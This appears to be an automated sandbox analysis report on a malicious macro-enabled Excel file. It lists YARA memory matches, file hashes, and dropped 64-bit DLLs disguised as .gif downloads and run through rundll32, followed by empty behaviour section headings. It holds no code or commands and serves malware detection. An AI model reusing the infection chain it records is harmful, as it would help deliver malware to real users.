Source: Yara match	File source: 00000003.00000003.2318832417.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294985377.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289046679.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2324458781.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2347597509.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2295056636.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2294958860.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2289433187.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2341036692.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2301147013.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2340962857.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY

ID:	382870
Product:	CloudBasic
Start time:	19:34:43
Start date:	06.04.2021
Sample:	document-1251000362.xlsm
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Architecture:	WINDOWS
MD5:	09217c79f99bbfe977a80d83d62489c7
SHA1:	da600d355dfb57190a5745342f3cfeb7d1e509f1
SHA256:	7bf8049e4766a2985851a3d3bf01710c53c389fe1e54397fa332672b62b649d8
Filetype:	Excel Microsoft Office Open XML Format document (40004/1) 83.33%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, 58596 bytes, 1 file	61A03D15CF62612F50B74867090DBE79	15228F34067B4B107E917BEBAF17CC7C3C1280A8	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A	data	D4AE187B4574036C2D76B6DF8A8C1A30	B06F409FA14BAB33CBAF4A37811B8740B624D9E5	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	65FDEB8FFAD4D99DAD4952E672875870	2EDD7085F937534FAF45EB269432653231B21FA5	B61FD6EA338CFAFF4DB22BB7BA45912209484A2F2E6CF7284DBF75DBDA4828E7
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A	data	532C2C5013FA0AEB515621E3AE61BEDB	4356A124AB1EC90E2EC8E1295E5363602CEBFD95	32DD398387EF5B5EA8442A55E8297EBC9854BB8E64849C2157A9AF89C57482FE
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif	PE32+ executable (DLL) (native) x86-64, for MS Windows	F029290EA011A5F9C6F7880F35D23A1B	384FB5A582A4AA67E0BE9716D5E260258E2FA3B2	A7B8E0DF5276942405D485EB808FA19B24E42D9758CACF1515028122755C2513
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	94233B243340F796260350A45DBC7D46	EA8F87964CE33A381F8779AD212907FC30CC470F	BF4D7AAF16DD3806DB0C54096EE9CAF23316C2A6C9D1F6ABC55B39215E88F685
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AE58898.png	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	A516B6CB784827C6BDE58BC9D341C1BD	9D602E7248E06FF639E6437A0A16EA7A4F9E6C73	EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\77F73266.png	PNG image data, 485 x 185, 8-bit/color RGB, non-interlaced	13CE435F07ADD2BEABD4A860755B489D	6CB356E6EA48633D56B49E578039818E493D364F	AA2172D7F8454BEF43575C8877FCA816254D49BE7A9AF420B0C7FEE0169058E4
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\98EC7FB9.png	PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced	02DB1068B56D3FD907241C2F3240F849	58EC338C879DDBDF02265CBEFA9A2FB08C569D20	D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFB60433.png	PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced	D8574C9CC4123EF67C8B600850BE52EE	5547AC473B3523BA2410E04B75E37B1944EE0CCC	ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
C:\Users\user\AppData\Local\Temp\C4DE0000	data	0104F96722B10FAC20846193E46EDCE7	54A7F48C8C0C74DB859D84CDF23193F059A55381	48B48EBECE4F07BF589CD65C8E7A370A080EB6049504F2C8B7C8E1D9AC04E7DF
C:\Users\user\AppData\Local\Temp\CabDF39.tmp	Microsoft Cabinet archive data, 58596 bytes, 1 file	61A03D15CF62612F50B74867090DBE79	15228F34067B4B107E917BEBAF17CC7C3C1280A8	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
C:\Users\user\AppData\Local\Temp\TarDF3A.tmp	data	4E0487E929ADBBA279FD752E7FB9A5C4	2497E03F42D2CBB4F4989E87E541B5BB27643536	AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Apr 7 01:35:39 2021, atime=Wed Apr 7 01:35:39 2021, length=16384, window=hide	F02EEDCF2D6213F4DCE41C411FF6A1DF	9EAE75F1647961136A08C02262F57CF9EF21987A	5CA53E61600946C945402724D4E7AD7D4639C5B4DBC671680EC2A380D2CB68BD
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1251000362.LNK	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Apr 7 01:35:39 2021, atime=Wed Apr 7 01:35:40 2021, length=108032, window=hide	5A2D5AF1B69DF237A0550063F6DD5AB4	FDD7B14490302915CBC1C6E922E576B3F6430444	B11E2624AA4EBAA0BC9763072CD0A580C8E1AB3391AB59FC000DE984C1A0DF44
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat	ASCII text, with CRLF line terminators	A348D9A6AAD55F97FEFAD8FED3E7A810	CB3796F3CD7CE5AF7E0DAE21286139F2721E6D62	FA8C4325ABC8119436E0C362DD14561B1285287EC56CC4D99E4CD3D8112EAC24
C:\Users\user\Desktop\A5DE0000	data	0104F96722B10FAC20846193E46EDCE7	54A7F48C8C0C74DB859D84CDF23193F059A55381	48B48EBECE4F07BF589CD65C8E7A370A080EB6049504F2C8B7C8E1D9AC04E7DF
C:\Users\user\Desktop\~$document-1251000362.xlsm	data	96114D75E30EBD26B572C1FC83D1D02E	A44EEBDA5EB09862AC46346227F06F8CFAF19407	0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
C:\Users\user\ksjvoefv.skd	PE32+ executable (DLL) (native) x86-64, for MS Windows	F029290EA011A5F9C6F7880F35D23A1B	384FB5A582A4AA67E0BE9716D5E260258E2FA3B2	A7B8E0DF5276942405D485EB808FA19B24E42D9758CACF1515028122755C2513
C:\Users\user\ksjvoefv.skd3	PE32+ executable (DLL) (GUI) x86-64, for MS Windows	94233B243340F796260350A45DBC7D46	EA8F87964CE33A381F8779AD212907FC30CC470F	BF4D7AAF16DD3806DB0C54096EE9CAF23316C2A6C9D1F6ABC55B39215E88F685

Analysis Report document-1251000362.xlsm

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains